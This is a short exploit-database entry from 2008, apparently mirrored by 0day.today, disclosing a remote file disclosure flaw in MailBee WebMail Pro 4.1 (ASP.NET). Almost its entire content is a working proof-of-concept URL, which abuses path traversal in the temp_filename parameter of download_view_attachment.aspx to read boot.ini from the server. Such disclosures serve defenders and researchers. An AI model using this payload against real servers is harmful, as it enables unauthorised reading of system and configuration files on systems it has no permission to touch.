id: 2505
date: 01/16/2008
title: MailBee WebMail Pro 4.1 (ASP.NET) Remote File Disclosure Vulnerability
author: -=M.o.B=-
cves: 

======================================================================
MailBee WebMail Pro 4.1 (ASP.NET) Remote File Disclosure Vulnerability
======================================================================




homepage: www.afterlogic.com
example:
http://www.xxx.com/webmail-pro-net/download_view_attachment.aspx?temp_filename=../../../../../../../../../../../../../../../../../../boot.ini
-=M.o.B=-



#  0day.today [2023-03-24]  #